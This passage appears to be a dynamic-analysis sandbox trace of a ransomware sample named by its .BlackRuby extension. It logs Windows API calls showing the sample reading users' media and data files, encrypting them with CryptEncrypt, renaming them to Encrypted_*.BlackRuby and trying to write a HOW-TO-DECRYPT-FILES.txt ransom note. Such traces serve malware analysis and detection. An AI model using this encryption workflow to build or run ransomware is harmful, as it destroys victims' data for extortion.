(hProv=0x37c790, dwFlags=0x0) returned 1 [0050.491] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", lpFilePart=0x0) returned 0x39 [0050.491] GetLastError () returned 0x0 [0050.491] SetErrorMode (uMode=0x1) returned 0x0 [0050.491] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2mcrsfjey4lykwjh0e9r.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.492] GetLastError () returned 0xb7 [0050.492] GetFileType (hFile=0x184) returned 0x1 [0050.492] SetErrorMode (uMode=0x0) returned 0x1 [0050.492] GetFileType (hFile=0x184) returned 0x1 [0050.494] CloseHandle (hObject=0x184) returned 1 [0050.494] GetLastError () returned 0xb7 [0050.494] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi", lpFilePart=0x0) returned 0x39 [0050.494] GetLastError () returned 0xb7 [0050.495] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_HXUJpQ16nB0ijfIiVmLwVwn8mr5EHoMJdYt8OcnT1.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_HXUJpQ16nB0ijfIiVmLwVwn8mr5EHoMJdYt8OcnT1.BlackRuby", lpFilePart=0x0) returned 0x5e [0050.495] GetLastError () returned 0xb7 [0050.495] SetErrorMode (uMode=0x1) returned 0x0 [0050.495] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2mcrsfjey4lykwjh0e9r.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6ecbf360, ftCreationTime.dwHighDateTime=0x1d357ea, ftLastAccessTime.dwLowDateTime=0x9a8aec70, ftLastAccessTime.dwHighDateTime=0x1d34ab8, ftLastWriteTime.dwLowDateTime=0x264c7440, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x13c20)) returned 1 [0050.495] GetLastError () returned 0xb7 [0050.495] SetErrorMode (uMode=0x0) returned 0x1 [0050.495] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2mCRsfJEY4LYKwjH0E9r.avi" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2mcrsfjey4lykwjh0e9r.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_HXUJpQ16nB0ijfIiVmLwVwn8mr5EHoMJdYt8OcnT1.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_hxujpq16nb0ijfiivmlwvwn8mr5ehomjdyt8ocnt1.blackruby")) returned 1 [0050.495] GetLastError () returned 0xb7 [0050.495] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.495] GetLastError () returned 0xb7 [0050.496] SetErrorMode (uMode=0x1) returned 0x0 [0050.496] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.496] GetLastError () returned 0x5 [0050.496] SetErrorMode (uMode=0x0) returned 0x1 [0050.497] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", lpFilePart=0x0) returned 0x35 [0050.497] GetLastError () returned 0x5 [0050.497] SetErrorMode (uMode=0x1) returned 0x0 [0050.497] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2notpxplkby3m1kq.mkv"), fInfoLevelId=0x0, lpFileInformation=0x1c7afd0 | out: lpFileInformation=0x1c7afd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa03810, ftCreationTime.dwHighDateTime=0x1d34edf, ftLastAccessTime.dwLowDateTime=0xd9fb6290, ftLastAccessTime.dwHighDateTime=0x1d34e05, ftLastWriteTime.dwLowDateTime=0xd9fb6290, ftLastWriteTime.dwHighDateTime=0x1d34e05, nFileSizeHigh=0x0, nFileSizeLow=0x1635a)) returned 1 [0050.497] GetLastError () returned 0x5 [0050.497] SetErrorMode (uMode=0x0) returned 0x1 [0050.497] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", lpFilePart=0x0) returned 0x35 [0050.497] GetLastError () returned 0x5 [0050.497] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", lpFilePart=0x0) returned 0x35 [0050.497] GetLastError () returned 0x5 [0050.497] SetErrorMode (uMode=0x1) returned 0x0 [0050.497] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2notpxplkby3m1kq.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.497] GetLastError () returned 0x0 [0050.497] GetFileType (hFile=0x184) returned 0x1 [0050.497] SetErrorMode (uMode=0x0) returned 0x1 [0050.497] GetFileType (hFile=0x184) returned 0x1 [0050.497] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x1635a [0050.497] GetLastError () returned 0x0 [0050.498] ReadFile (in: hFile=0x184, lpBuffer=0x2dd8c30, nNumberOfBytesToRead=0x1635a, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2dd8c30*, lpNumberOfBytesRead=0x18ed18*=0x1635a, lpOverlapped=0x0) returned 1 [0050.499] GetLastError () returned 0x0 [0050.499] CloseHandle (hObject=0x184) returned 1 [0050.499] GetLastError () returned 0x0 [0050.500] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", lpFilePart=0x0) returned 0x35 [0050.500] GetLastError () returned 0x0 [0050.500] SetErrorMode (uMode=0x1) returned 0x0 [0050.500] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2notpxplkby3m1kq.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa03810, ftCreationTime.dwHighDateTime=0x1d34edf, ftLastAccessTime.dwLowDateTime=0xd9fb6290, ftLastAccessTime.dwHighDateTime=0x1d34e05, ftLastWriteTime.dwLowDateTime=0xd9fb6290, ftLastWriteTime.dwHighDateTime=0x1d34e05, nFileSizeHigh=0x0, nFileSizeLow=0x1635a)) returned 1 [0050.501] GetLastError () returned 0x0 [0050.501] SetErrorMode (uMode=0x0) returned 0x1 [0050.511] CryptImportKey (in: hProv=0x37c708, pbData=0x1cd6d78, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360b20) returned 1 [0050.511] GetLastError () returned 0x0 [0050.511] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.511] GetLastError () returned 0x0 [0050.516] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.516] GetLastError () returned 0x0 [0050.516] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360f60) returned 1 [0050.516] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.516] GetLastError () returned 0x0 [0050.517] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1d03dc4*=0x1, dwFlags=0x0) returned 1 [0050.517] GetLastError () returned 0x0 [0050.517] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1d03d90, dwFlags=0x0) returned 1 [0050.517] GetLastError () returned 0x0 [0050.527] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2ae8450*, pdwDataLen=0x18ed08*=0x16450, dwBufLen=0x16450 | out: pbData=0x2ae8450*, pdwDataLen=0x18ed08*=0x16450) returned 1 [0050.528] GetLastError () returned 0x0 [0050.528] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b23c60*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b23c60*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.528] GetLastError () returned 0x0 [0050.528] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b23c90*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b23c90*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.528] GetLastError () returned 0x0 [0050.530] CryptDestroyKey (hKey=0x360b20) returned 1 [0050.530] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.530] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0050.530] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", lpFilePart=0x0) returned 0x35 [0050.530] GetLastError () returned 0x0 [0050.530] SetErrorMode (uMode=0x1) returned 0x0 [0050.530] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2notpxplkby3m1kq.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.532] GetLastError () returned 0xb7 [0050.532] GetFileType (hFile=0x184) returned 0x1 [0050.532] SetErrorMode (uMode=0x0) returned 0x1 [0050.532] GetFileType (hFile=0x184) returned 0x1 [0050.532] WriteFile (in: hFile=0x184, lpBuffer=0x2b415f0*, nNumberOfBytesToWrite=0x16460, lpNumberOfBytesWritten=0x18ed24, lpOverlapped=0x0 | out: lpBuffer=0x2b415f0*, lpNumberOfBytesWritten=0x18ed24*=0x16460, lpOverlapped=0x0) returned 1 [0050.534] GetLastError () returned 0xb7 [0050.534] CloseHandle (hObject=0x184) returned 1 [0050.535] GetLastError () returned 0xb7 [0050.535] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv", lpFilePart=0x0) returned 0x35 [0050.535] GetLastError () returned 0xb7 [0050.535] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_5NWXuUat9oq2BZeTd4XB3tDj1GBD9AkDoxv4.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_5NWXuUat9oq2BZeTd4XB3tDj1GBD9AkDoxv4.BlackRuby", lpFilePart=0x0) returned 0x59 [0050.535] GetLastError () returned 0xb7 [0050.535] SetErrorMode (uMode=0x1) returned 0x0 [0050.535] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2notpxplkby3m1kq.mkv"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa03810, ftCreationTime.dwHighDateTime=0x1d34edf, ftLastAccessTime.dwLowDateTime=0xd9fb6290, ftLastAccessTime.dwHighDateTime=0x1d34e05, ftLastWriteTime.dwLowDateTime=0x26539860, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x16460)) returned 1 [0050.535] GetLastError () returned 0xb7 [0050.535] SetErrorMode (uMode=0x0) returned 0x1 [0050.535] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2nOtpxplKBy3M1kQ.mkv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2notpxplkby3m1kq.mkv"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_5NWXuUat9oq2BZeTd4XB3tDj1GBD9AkDoxv4.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_5nwxuuat9oq2bzetd4xb3tdj1gbd9akdoxv4.blackruby")) returned 1 [0050.536] GetLastError () returned 0xb7 [0050.537] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.537] GetLastError () returned 0xb7 [0050.537] SetErrorMode (uMode=0x1) returned 0x0 [0050.537] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.537] GetLastError () returned 0x5 [0050.538] SetErrorMode (uMode=0x0) returned 0x1 [0050.538] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", lpFilePart=0x0) returned 0x2e [0050.538] GetLastError () returned 0x5 [0050.538] SetErrorMode (uMode=0x1) returned 0x0 [0050.538] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2zigrttmk.csv"), fInfoLevelId=0x0, lpFileInformation=0x1b40f70 | out: lpFileInformation=0x1b40f70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf2c4120, ftCreationTime.dwHighDateTime=0x1d34d4f, ftLastAccessTime.dwLowDateTime=0x1099a350, ftLastAccessTime.dwHighDateTime=0x1d34d90, ftLastWriteTime.dwLowDateTime=0x1099a350, ftLastWriteTime.dwHighDateTime=0x1d34d90, nFileSizeHigh=0x0, nFileSizeLow=0x1f8e)) returned 1 [0050.538] GetLastError () returned 0x5 [0050.538] SetErrorMode (uMode=0x0) returned 0x1 [0050.539] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", lpFilePart=0x0) returned 0x2e [0050.539] GetLastError () returned 0x5 [0050.539] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", lpFilePart=0x0) returned 0x2e [0050.539] GetLastError () returned 0x5 [0050.539] SetErrorMode (uMode=0x1) returned 0x0 [0050.539] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2zigrttmk.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.539] GetLastError () returned 0x0 [0050.539] GetFileType (hFile=0x184) returned 0x1 [0050.539] SetErrorMode (uMode=0x0) returned 0x1 [0050.539] GetFileType (hFile=0x184) returned 0x1 [0050.539] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x1f8e [0050.539] GetLastError () returned 0x0 [0050.539] ReadFile (in: hFile=0x184, lpBuffer=0x1b42ef0, nNumberOfBytesToRead=0x1f8e, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1b42ef0*, lpNumberOfBytesRead=0x18ed18*=0x1f8e, lpOverlapped=0x0) returned 1 [0050.540] GetLastError () returned 0x0 [0050.540] CloseHandle (hObject=0x184) returned 1 [0050.540] GetLastError () returned 0x0 [0050.540] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", lpFilePart=0x0) returned 0x2e [0050.540] GetLastError () returned 0x0 [0050.540] SetErrorMode (uMode=0x1) returned 0x0 [0050.540] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2zigrttmk.csv"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf2c4120, ftCreationTime.dwHighDateTime=0x1d34d4f, ftLastAccessTime.dwLowDateTime=0x1099a350, ftLastAccessTime.dwHighDateTime=0x1d34d90, ftLastWriteTime.dwLowDateTime=0x1099a350, ftLastWriteTime.dwHighDateTime=0x1d34d90, nFileSizeHigh=0x0, nFileSizeLow=0x1f8e)) returned 1 [0050.540] GetLastError () returned 0x0 [0050.540] SetErrorMode (uMode=0x0) returned 0x1 [0050.540] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c818) returned 1 [0050.541] GetLastError () returned 0x0 [0050.573] CryptImportKey (in: hProv=0x37c818, pbData=0x1ba11c0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ce0) returned 1 [0050.573] GetLastError () returned 0x0 [0050.573] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.573] GetLastError () returned 0x0 [0050.578] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.578] GetLastError () returned 0x0 [0050.578] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360aa0) returned 1 [0050.578] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0050.579] GetLastError () returned 0x0 [0050.579] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1bce20c*=0x1, dwFlags=0x0) returned 1 [0050.579] GetLastError () returned 0x0 [0050.579] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1bce1d8, dwFlags=0x0) returned 1 [0050.579] GetLastError () returned 0x0 [0050.579] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bce254*, pdwDataLen=0x18ed08*=0x2080, dwBufLen=0x2080 | out: pbData=0x1bce254*, pdwDataLen=0x18ed08*=0x2080) returned 1 [0050.579] GetLastError () returned 0x0 [0050.579] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1bd2380*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1bd2380*, pdwDataLen=0x18ed20*=0x10) returned 1 [0050.579] GetLastError () returned 0x0 [0050.579] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1bd23b0*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1bd23b0*, pdwDataLen=0x18ed28*=0x10) returned 1 [0050.579] GetLastError () returned 0x0 [0050.579] CryptDestroyKey (hKey=0x360ce0) returned 1 [0050.579] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.579] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0050.579] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", lpFilePart=0x0) returned 0x2e [0050.579] GetLastError () returned 0x0 [0050.579] SetErrorMode (uMode=0x1) returned 0x0 [0050.579] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2zigrttmk.csv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0050.580] GetLastError () returned 0xb7 [0050.580] GetFileType (hFile=0x184) returned 0x1 [0050.580] SetErrorMode (uMode=0x0) returned 0x1 [0050.580] GetFileType (hFile=0x184) returned 0x1 [0050.582] CloseHandle (hObject=0x184) returned 1 [0050.582] GetLastError () returned 0xb7 [0050.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv", lpFilePart=0x0) returned 0x2e [0050.582] GetLastError () returned 0xb7 [0050.582] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_rEYlyXAiSRXKdT1EmKjQZpdKFfJCzW88zNyzSiBd9SI.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_rEYlyXAiSRXKdT1EmKjQZpdKFfJCzW88zNyzSiBd9SI.BlackRuby", lpFilePart=0x0) returned 0x60 [0050.582] GetLastError () returned 0xb7 [0050.582] SetErrorMode (uMode=0x1) returned 0x0 [0050.582] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2zigrttmk.csv"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf2c4120, ftCreationTime.dwHighDateTime=0x1d34d4f, ftLastAccessTime.dwLowDateTime=0x1099a350, ftLastAccessTime.dwHighDateTime=0x1d34d90, ftLastWriteTime.dwLowDateTime=0x265abc80, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x2090)) returned 1 [0050.582] GetLastError () returned 0xb7 [0050.582] SetErrorMode (uMode=0x0) returned 0x1 [0050.582] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\2ZiGRTtMK.csv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2zigrttmk.csv"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Encrypted_rEYlyXAiSRXKdT1EmKjQZpdKFfJCzW88zNyzSiBd9SI.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\encrypted_reylyxaisrxkdt1emkjqzpdkffjczw88znyzsibd9si.blackruby")) returned 1 [0050.582] GetLastError () returned 0xb7 [0050.583] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x39 [0050.583] GetLastError () returned 0xb7 [0050.583] SetErrorMode (uMode=0x1) returned 0x0 [0050.583] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0050.583] GetLastError () returned 0x5 [0050.584] SetErrorMode (uMode=0x0) returned 0x1 [0050.584] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\3qJ4sGW.m4a", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\3qJ4sGW.m4a", lpFilePart=0x0) returned 0x2c [0050.584] GetLastError () returned 0x5 [0050.584] SetErrorMode (uMode=0x1) returned 0x0 [0050.584] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\3qJ4sGW.m4a" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\3qj4sgw.m4a"), fInfoLevelId=0x0, lpFileInformation=0x1bf5824 | out: lpFileInformation=0x1bf5824*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x22b734e0, ftCreationTime.dwHighDateTime=0x1d35064, ftLastAccessTime.dwLowDateTime=0x1149e850, ftLastAccessTime.dwHighDateTime=0x1d35948, ftLastWriteTime.dwLowDateTime=0x1149e850, ftLastWriteTime.dwHighDateTime=0x1d35948, nFileSizeHigh=0x0, nFileSizeLow=0x11c37)) returned 1 [0050.584] GetLastError () returned 0x5 [0050.584] SetErrorMode (uMode=0x0) returned 0x1 [0050.584] GetFullPathNameW (in: 